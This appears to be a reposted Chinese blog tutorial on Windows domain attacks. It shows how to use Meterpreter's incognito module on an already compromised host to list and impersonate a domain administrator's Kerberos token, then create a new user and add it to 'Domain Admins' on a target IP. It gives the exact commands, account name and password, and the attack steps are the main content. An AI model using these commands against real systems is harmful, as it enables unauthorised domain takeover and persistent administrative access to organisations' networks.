erberos是一种计算机网络认证协议,它允许某实体在非安全网络环境下通信,向另一个实体以一种安全的方式证明自己的身份。它也指由麻省理工实现此协议,并发布的一套免费软件。它的设计主要针对客户-服务器模型,并提供了一系列交互认证——用户和服务器都能验证对方的身份。

当成功的***了一个系统并建立了一个meterpreter的终端,域管理员登陆这台机器的时候会发送Kerberos令牌到服务器上。我们可以使用这个活动令牌来***系统,通过meterpreter可以假冒成域管理员的角色,而不需要破解它的密码然后可以去***域管理员账号甚至域控制器。

在meterpreter的终端下加载incognito模块list_tokens -u列举出令牌,看到1230TT\\Administrator域管理员账号我们可以假冒它

假冒Administrator域管理员账号

impersonate_token 1230TT\\Administrator

添加用户add_user 11 p@55w0rd! -h 192.168.1.150
把用户添加到域管理员组add_group_user “Domain Admins” 11 -h 192.168.1.150

这样很简单就可以添加了一个域管理员用户了

原文链接:http://1230tt.com/archives/250.html

转载于:https://blog.51cto.com/2308741/1338870

WINDOWS假冒KERBEROS令牌***域相关推荐

  1. Windows权限提升—令牌窃取、UAC提权、进程注入等提权

    Windows权限提升-令牌窃取.UNC提权.进程注入等提权 1. 前言 2. at本地命令提权 2.1. 适用范围 2.2. 命令使用 2.3. 操作步骤 2.3.1. 模拟提权 2.3.2. at ...

  2. Windows Server 2016-Active Directory域服务端口汇总

    本章为大家简单整理一下有关Windows server Active Directory和Active Directory域服务(AD DS)组件的端口要求.生产环境中我们在做网络调整.防火墙或者开关 ...

  3. Windows客户机脱域问题及解决办法

    Windows客户机脱域问题及解决办法 参考文章: (1)Windows客户机脱域问题及解决办法 (2)https://www.cnblogs.com/happygoes/p/4788304.html ...

  4. 在windows 2008下不同域活动目录迁移(ADMT3.1)

    今天抽空做了一下,对比我之前写的windows 2003平台之间迁移,基本是差别不多! 在两个不同域中的WINDOWS 2003活动目录做迁移笔记 ([url]http://godoha.blog.5 ...

  5. windows搭建内网 域环境 域控制器 win7加入域

    1 搭建域环境 相关地址:www.920vip.net/article/58 通常所说的内网渗透测试,很大程度就是域渗透测试. 常见的域环境是使用:Windows Server 2012 R2.Win ...

  6. 使用windows 7加入windows server 2008的域!

    今天在虚拟机中测试如何使用windows 7加入windows server 2008的域实验. 首先让windows server 2008去创建AD,成为域中的DC. 使用dcpromo进行创建D ...

  7. 【转】SharePoint 2013中修改windows 活动目录(AD)域用户密码的WebPart(免费下载)

    前段时间工作很忙,好久没更新博客了,趁国庆休假期间,整理了两个之前积累很实用的企业集成组件,并在真正的大型项目中经受住了考验:.Net版SAP RFC适配器组件和SharePoint 2013修改AD ...

  8. SharePoint 2013中修改windows 活动目录(AD)域用户密码的WebPart(免费下载)

    转:http://www.cnblogs.com/nbpowerboy/p/3355943.html 前段时间工作很忙,好久没更新博客了,趁国庆休假期间,整理了两个之前积累很实用的企业集成组件,并在真 ...

  9. Windows Server 2008搭建域环境---安装活动目录

    搭建域环境 首先搭建一个单域环境,掌握活动目录的功能,后面的章节将会讲授活动目录树活动目录林,以及林之间的信任.在现阶段只介绍单域单域控制器环境中如何使用活动目录集中管理和统一身份验证. 目标 u 学 ...

最新文章

  1. java hashcode返回1_java – 为什么hashCode()在所有连续执行中为对象返回相同的值?...
  2. 在不同的ObjectContext中更新数据
  3. 成年人改变生活的方式,都是从它开始
  4. POJ 3734_Blocks
  5. RCE 0day影响数万台QNAP SOHO NAS 设备
  6. sublime text3 智能提示和自动补全
  7. 【51nod 1439】互斥对【容斥原理】
  8. Delta并联机构运动学分析
  9. GEE学习笔记 七十七:GEE学习方法简介
  10. java数字时钟代码,Android自定义数字时钟代码,android自定义时钟,package jp.t
  11. 神经网络常用的训练方式,神经网络训练过程详解
  12. C#连接数据库自动生成实体类
  13. 计算机基础之终端(DOS)的正确认识和重要性——Windows系统cmd与环境变量(java环境配置)
  14. discuz 3.1修改浏览器顶部标题 - Powered by Discuz!
  15. 传统行业如何“玩”大数据?
  16. feko金属球远场RCS双站
  17. 重构:运用Java反射加多态 “干掉” switch
  18. 【应用案例】1200PLC应用:抢答器,音乐喷泉
  19. 安全——网络安全协议的引入
  20. jelly_Android Jelly Bean通知教程

热门文章

  1. 如何linux安装apache服务器,Linux中如何安装Apache服务器
  2. carve into_最新carve的用法和短语例句
  3. eclipse中编译运行maven项目使用jetty
  4. 无需搭建和训练模型,87行代码搞定文章摘要生成
  5. 不只有BERT!盘点2018年NLP令人激动的10大想法
  6. 2500万美元和AI专家!谷歌出钱出人,要用AI做“对社会有益”的事情
  7. 北大主场夺金ACM-ICPC全球总决赛,总教练罗国杰分享背后“秘笈”
  8. 如何在阿里云上安全的存放您的配置
  9. 传输层协议TCP和UDP
  10. rac one node在线relocation